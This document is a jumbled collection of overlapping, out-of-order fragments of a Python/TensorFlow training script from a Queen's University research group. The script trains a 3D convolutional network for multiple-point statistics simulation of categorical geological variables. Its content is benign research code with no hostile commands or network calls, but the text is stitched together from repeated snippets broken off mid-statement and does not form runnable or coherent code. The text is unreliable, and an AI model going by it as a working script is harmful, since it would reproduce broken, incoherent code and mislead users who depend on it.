The", "DBname=TrainingImage, Lvl=5, Training=True, Padding=True) print(\"[Sim]\") TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart), Plot=True) print(\"[Saving Grid]\")", "HyperPar.append(1) # MinDC - Num 10 HyperPar.append(1500) # Num Fully", "divided by 3 so 1% is 10 represents 1% HyperPar.append(1)", "Num 1 HyperPar.append(50) # SGsizez - Num 2 HyperPar.append(int(7)) #", "= np.around(((MaxLR - MinLR)/StepLR)*cuos + MinLR, decimals=7) else: LearningRate =", "= 512 TrainingImage = \"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\" LocModel = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]),", "\", int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]), \"IP: \", int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8])) Ncicles = 500 Nepoch =", "int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocModel = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]),", "not free of bugs but running end-to-end. Any comments and", "'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocFile = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]),", "perform MPS in 3D for categorical variables. It has been", "Num 11 HyperPar.append(3) # wdnh - Num 12 HyperPar.append(16) #", "import time import External_Functions_3D as fns_nested import gc for ind0", "not display the AVX message about using GPU import os", "10 HyperPar.append(1500) # Num Fully Connected - Num 11 HyperPar.append(3)", "3 HyperPar.append(int(7)) # Search_y - Num 4 HyperPar.append(int(7)) # Search_z", "Connected - Num 11 HyperPar.append(3) # wdnh - Num 12", "- Canada\"\"\" # Do not display the AVX message about", "program. 
The code is not free of bugs but running", "int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocModel = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]),", "print(\"[Train]\") TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples, LocModel=LocModel, LR=LearningRate) print(\"--%s seconds of whole training", "training process-\" % (np.around((time.time() - start_time_1), decimals=2))) gc.collect() print(\" \")", "External_Functions_3D as fns_nested import gc for ind0 in range(1): start_time_AllTrain", "print(\"--%s seconds of whole training process-\" % (np.around((time.time() - start_time_1),", "int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocFile = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]),", "0.001 StepLR = 10 PointStart = 1 for indTrain in", "os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' #from tensorflow.python.client import device_lib #print(device_lib.list_local_devices()) #os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" #", "MinLR)/StepLR)*cuos + MinLR, decimals=7) else: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*(StepLR", "# SGsizex - Num 0 HyperPar.append(50) # SGsizey - Num", "tensorflow as tf import time import External_Functions_3D as fns_nested import", "HyperPar.append(int(7)) # Search_z - Num 5 HyperPar.append(int(7)) # IPsizex -", "University as part of a PhD program. The code is", "the Version 1.0 of the RCNN approach to perform MPS", "MinLR)/StepLR)*(StepLR - cuos) + MaxLR, decimals=7) start_time_1 = time.time() print", "- Num 8 HyperPar.append(50) # Percentage of Data Conditioning -", "1 for indTrain in range(Ncicles): #HyperPar[9] = np.random.randint(41)+10 cuos =", "## ######################### import numpy as np import tensorflow as tf", "Percentage of Data Conditioning - Num 9 .. divided by", "= 250 Nsamples = 512 TrainingImage = \"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\" LocModel =", "start_time_1), decimals=2))) gc.collect() print(\" \") print(\"--%s minutes of ALL training-\"", "The code is not free of bugs but running end-to-end.", "# convdepth - Num 13 HyperPar.append(2) # num of categories", "= fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=3,Training=False, Padding=True) TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1) MaxLR, MinLR =", "fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=3,Training=False, Padding=True) TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1) MaxLR, MinLR = 0.01,", "recevied to: <EMAIL> April 16, 2019. 
Geomet Group - Queen's", "= 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocModel = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]),", "= 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) print(\"[Graph]\") #fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel)", "\", int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8])) Ncicles = 500 Nepoch = 1 #Nbatch =", "# To save the TI TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=3,Training=False,", "- MinLR)/StepLR)*cuos + MinLR, decimals=7) else: LearningRate = np.around(((MaxLR -", "TrainingImage = \"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\" LocModel = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13]))", "Num 8 HyperPar.append(50) # Percentage of Data Conditioning - Num", "8 HyperPar.append(50) # Percentage of Data Conditioning - Num 9", "approach to perform MPS in 3D for categorical variables. It", "Nepoch = 1 #Nbatch = 250 Nsamples = 512 TrainingImage", "improvements are well recevied to: <EMAIL> April 16, 2019. Geomet", "- cuos) + MaxLR, decimals=7) start_time_1 = time.time() print (\"Cicle:", "1.0 of the RCNN approach to perform MPS in 3D", "= 0.01, 0.001 StepLR = 10 PointStart = 1 for", "os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' #from tensorflow.python.client import device_lib #print(device_lib.list_local_devices()) #os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"", "HyperPar.append(50) # SGsizey - Num 1 HyperPar.append(50) # SGsizez -", "as part of a PhD program. The code is not", "HyperPar.append(2) # num of categories - Num 14 print(\"SG: \",", "9 .. divided by 3 so 1% is 10 represents", "are well recevied to: <EMAIL> April 16, 2019. Geomet Group", "is the Version 1.0 of the RCNN approach to perform", "#LocModel = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) LocFile =", "code is not free of bugs but running end-to-end. Any", "April 16, 2019. Geomet Group - Queen's University - Canada\"\"\"", "of Data Conditioning - Num 9 .. 
divided by 3", "TI TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=3,Training=False, Padding=True) TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1) MaxLR,", "TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=3,Training=False, Padding=True) TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1) MaxLR, MinLR", "has been developed by <NAME> and <NAME> in the Geometallurygical", "as tf import time import External_Functions_3D as fns_nested import gc", "- Num 5 HyperPar.append(int(7)) # IPsizex - Num 6 HyperPar.append(int(7))", "= fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=5, Training=True, Padding=True) print(\"[Sim]\") TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart), Plot=True)", "see issue #152 #os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" ## ######################### import numpy as np", "+ MaxLR, decimals=7) start_time_1 = time.time() print (\"Cicle: {}\".format(indTrain+PointStart), \"Learning", "# IPsizey - Num 7 HyperPar.append(int(7)) # IPsizez - Num", "12 HyperPar.append(16) # convdepth - Num 13 HyperPar.append(2) # num", "PointStart = 1 for indTrain in range(Ncicles): #HyperPar[9] = np.random.randint(41)+10", "gc.collect() print(\" \") print(\"--%s minutes of ALL training-\" % ((time.time()", "#os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" ## ######################### import numpy as np import tensorflow as", "5 HyperPar.append(int(7)) # IPsizex - Num 6 HyperPar.append(int(7)) # IPsizey", "in range(1): start_time_AllTrain = time.time() HyperPar = [] HyperPar.append(50) #", "int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]), \"IP: \", int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8])) Ncicles = 500 Nepoch = 1", "import tensorflow as tf import time import External_Functions_3D as fns_nested", "512 TrainingImage = \"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\" LocModel = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]),", "Ncicles = 500 Nepoch = 1 #Nbatch = 250 Nsamples", "Num 0 HyperPar.append(50) # SGsizey - Num 1 HyperPar.append(50) #", "LearningRate = np.around(((MaxLR - MinLR)/StepLR)*(StepLR - cuos) + MaxLR, decimals=7)", "LocModel = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocModel = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]),", "Lvl=3,Training=False, Padding=True) TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1) MaxLR, MinLR = 0.01, 0.001 StepLR", "int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8])) Ncicles = 500 Nepoch = 1 #Nbatch = 250", "time import External_Functions_3D as fns_nested import gc for ind0 in", "3 so 1% is 10 represents 1% HyperPar.append(1) # MinDC", "int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) print(\"[Graph]\") #fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel) 
fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel) # To save", "is 10 represents 1% HyperPar.append(1) # MinDC - Num 10", "- Num 4 HyperPar.append(int(7)) # Search_z - Num 5 HyperPar.append(int(7))", "1% is 10 represents 1% HyperPar.append(1) # MinDC - Num", "# Do not display the AVX message about using GPU", "well recevied to: <EMAIL> April 16, 2019. Geomet Group -", "HyperPar.append(3) # wdnh - Num 12 HyperPar.append(16) # convdepth -", "Group - Queen's University - Canada\"\"\" # Do not display", "= 1 #Nbatch = 250 Nsamples = 512 TrainingImage =", "by 3 so 1% is 10 represents 1% HyperPar.append(1) #", "<NAME> and <NAME> in the Geometallurygical Group at Queen's University", "MinLR, decimals=7) else: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*(StepLR - cuos)", "int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) print(\"[Graph]\") #fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel) fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel) # To", "= np.random.randint(41)+10 cuos = indTrain%(2*StepLR) if cuos < StepLR: LearningRate", "part of a PhD program. The code is not free", "about using GPU import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' #from tensorflow.python.client", "to perform MPS in 3D for categorical variables. It has", "#152 #os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\" ## ######################### import numpy as np import tensorflow", "14 print(\"SG: \", int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]), \"IP: \", int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8])) Ncicles = 500", "- Num 11 HyperPar.append(3) # wdnh - Num 12 HyperPar.append(16)", "16, 2019. Geomet Group - Queen's University - Canada\"\"\" #", "Any comments and further improvements are well recevied to: <EMAIL>", "= 500 Nepoch = 1 #Nbatch = 250 Nsamples =", "fns_nested import gc for ind0 in range(1): start_time_AllTrain = time.time()", "<EMAIL> April 16, 2019. Geomet Group - Queen's University -", "so 1% is 10 represents 1% HyperPar.append(1) # MinDC -", "MinDC - Num 10 HyperPar.append(1500) # Num Fully Connected -", "decimals=2))) gc.collect() print(\" \") print(\"--%s minutes of ALL training-\" %", "Geometallurygical Group at Queen's University as part of a PhD", "the Geometallurygical Group at Queen's University as part of a", "MPS in 3D for categorical variables. It has been developed", "print(\"SG: \", int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]), \"IP: \", int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8])) Ncicles = 500 Nepoch", "start_time_1 = time.time() print (\"Cicle: {}\".format(indTrain+PointStart), \"Learning Rate: \", LearningRate)", "Num 2 HyperPar.append(int(7)) # Search_x - Num 3 HyperPar.append(int(7)) #", "SGsizey - Num 1 HyperPar.append(50) # SGsizez - Num 2", "end-to-end. 
Any comments and further improvements are well recevied to:", "HyperPar.append(int(7)) # IPsizey - Num 7 HyperPar.append(int(7)) # IPsizez -", "= time.time() print (\"Cicle: {}\".format(indTrain+PointStart), \"Learning Rate: \", LearningRate) TempSimGrid", "int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) LocFile = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13]))", "np.around(((MaxLR - MinLR)/StepLR)*cuos + MinLR, decimals=7) else: LearningRate = np.around(((MaxLR", "in 3D for categorical variables. It has been developed by", "#HyperPar[9] = np.random.randint(41)+10 cuos = indTrain%(2*StepLR) if cuos < StepLR:", "display the AVX message about using GPU import os os.environ['TF_CPP_MIN_LOG_LEVEL']", "11 HyperPar.append(3) # wdnh - Num 12 HyperPar.append(16) # convdepth", "MaxLR, decimals=7) start_time_1 = time.time() print (\"Cicle: {}\".format(indTrain+PointStart), \"Learning Rate:", "= \"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\" LocModel = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocModel", "ind0 in range(1): start_time_AllTrain = time.time() HyperPar = [] HyperPar.append(50)", "indTrain%(2*StepLR) if cuos < StepLR: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*cuos", "\"\"\"The present code is the Version 1.0 of the RCNN", "of bugs but running end-to-end. Any comments and further improvements", "Data Conditioning - Num 9 .. 
divided by 3 so", "0 HyperPar.append(50) # SGsizey - Num 1 HyperPar.append(50) # SGsizez", "range(Ncicles): #HyperPar[9] = np.random.randint(41)+10 cuos = indTrain%(2*StepLR) if cuos <", "time.time() HyperPar = [] HyperPar.append(50) # SGsizex - Num 0", "int(HyperPar[13])) LocFile = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocFile =", "int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) LocFile = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]),", "Search_z - Num 5 HyperPar.append(int(7)) # IPsizex - Num 6", "- Num 2 HyperPar.append(int(7)) # Search_x - Num 3 HyperPar.append(int(7))", "the AVX message about using GPU import os os.environ['TF_CPP_MIN_LOG_LEVEL'] =", "MinLR = 0.01, 0.001 StepLR = 10 PointStart = 1", "HyperPar = [] HyperPar.append(50) # SGsizex - Num 0 HyperPar.append(50)", "- MinLR)/StepLR)*(StepLR - cuos) + MaxLR, decimals=7) start_time_1 = time.time()", "= time.time() HyperPar = [] HyperPar.append(50) # SGsizex - Num", "if cuos < StepLR: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*cuos +", "print(\" \") print(\"--%s minutes of ALL training-\" % ((time.time() -", "fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=5, Training=True, Padding=True) print(\"[Sim]\") TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart), Plot=True) print(\"[Saving", "Num 12 HyperPar.append(16) # convdepth - Num 13 HyperPar.append(2) #", ".. 
divided by 3 so 1% is 10 represents 1%", "Num 13 HyperPar.append(2) # num of categories - Num 14", "int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocFile = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13]))", "Search_x - Num 3 HyperPar.append(int(7)) # Search_y - Num 4", "'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocModel = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]),", "the TI TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=3,Training=False, Padding=True) TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1)", "the RCNN approach to perform MPS in 3D for categorical", "(np.around((time.time() - start_time_1), decimals=2))) gc.collect() print(\" \") print(\"--%s minutes of", "in the Geometallurygical Group at Queen's University as part of", "TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples, LocModel=LocModel, LR=LearningRate) print(\"--%s seconds of whole training process-\"", "TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1) MaxLR, MinLR = 0.01, 0.001 StepLR = 10", "running end-to-end. Any comments and further improvements are well recevied", "Num 14 print(\"SG: \", int(HyperPar[3]),\"x\",int(HyperPar[4]),\"x\",int(HyperPar[5]), \"IP: \", int(HyperPar[6]),\"x\",int(HyperPar[7]),\"x\",int(HyperPar[8])) Ncicles =", "= 1 for indTrain in range(Ncicles): #HyperPar[9] = np.random.randint(41)+10 cuos", "indTrain+PointStart)) print(\"[Train]\") TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples, LocModel=LocModel, LR=LearningRate) print(\"--%s seconds of whole", "< StepLR: LearningRate = np.around(((MaxLR - MinLR)/StepLR)*cuos + MinLR, decimals=7)", "import gc for ind0 in range(1): start_time_AllTrain = time.time() HyperPar", "LocModel=LocModel) # To save the TI TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage,", "'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) LocFile = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]),", "% (np.around((time.time() - start_time_1), decimals=2))) gc.collect() print(\" \") print(\"--%s minutes", "- Num 1 HyperPar.append(50) # SGsizez - Num 2 HyperPar.append(int(7))", "Num 7 HyperPar.append(int(7)) # IPsizez - Num 8 HyperPar.append(50) #", "time.time() print (\"Cicle: {}\".format(indTrain+PointStart), \"Learning Rate: \", LearningRate) TempSimGrid =", "is not free of bugs but running end-to-end. 
Any comments", "int(HyperPar[13])) print(\"[Graph]\") #fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel) fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel) # To save the", "present code is the Version 1.0 of the RCNN approach", "# wdnh - Num 12 HyperPar.append(16) # convdepth - Num", "2019. Geomet Group - Queen's University - Canada\"\"\" # Do", "= [] HyperPar.append(50) # SGsizex - Num 0 HyperPar.append(50) #", "Num 4 HyperPar.append(int(7)) # Search_z - Num 5 HyperPar.append(int(7)) #", "LearningRate) TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=5, Training=True, Padding=True) print(\"[Sim]\") TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel,", "HyperPar.append(1500) # Num Fully Connected - Num 11 HyperPar.append(3) #", "# Search_x - Num 3 HyperPar.append(int(7)) # Search_y - Num", "as fns_nested import gc for ind0 in range(1): start_time_AllTrain =", "- Num 9 .. divided by 3 so 1% is", "HyperPar.append(int(7)) # IPsizex - Num 6 HyperPar.append(int(7)) # IPsizey -", "HyperPar.append(int(7)) # Search_x - Num 3 HyperPar.append(int(7)) # Search_y -", "\"Learning Rate: \", LearningRate) TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=5, Training=True,", "HyperPar.append(int(7)) # Search_y - Num 4 HyperPar.append(int(7)) # Search_z -", "#Nbatch = 250 Nsamples = 512 TrainingImage = \"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\" LocModel", "Rate: \", LearningRate) TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=5, Training=True, Padding=True)", "6 HyperPar.append(int(7)) # IPsizey - Num 7 HyperPar.append(int(7)) # IPsizez", "Nsamples = 512 TrainingImage = \"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\" LocModel = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]),", "'2' #from tensorflow.python.client import device_lib #print(device_lib.list_local_devices()) #os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" # see issue", "for indTrain in range(Ncicles): #HyperPar[9] = np.random.randint(41)+10 cuos = indTrain%(2*StepLR)", "Num 6 HyperPar.append(int(7)) # IPsizey - Num 7 HyperPar.append(int(7)) #", "0.01, 0.001 StepLR = 10 PointStart = 1 for indTrain", "Padding=True) TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1) MaxLR, MinLR = 0.01, 0.001 StepLR =", "\") print(\"--%s minutes of ALL training-\" % ((time.time() - start_time_AllTrain)/60))", "\", LearningRate) TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=5, Training=True, Padding=True) print(\"[Sim]\")", "free of bugs but running end-to-end. Any comments and further", "\"TI_Collaboration_1of4_50x50x50_newRepresentation.dat\" LocModel = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13])) #LocModel =", "- Queen's University - Canada\"\"\" # Do not display the", "To save the TI TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=3,Training=False, Padding=True)", "for categorical variables. It has been developed by <NAME> and", "variables. 
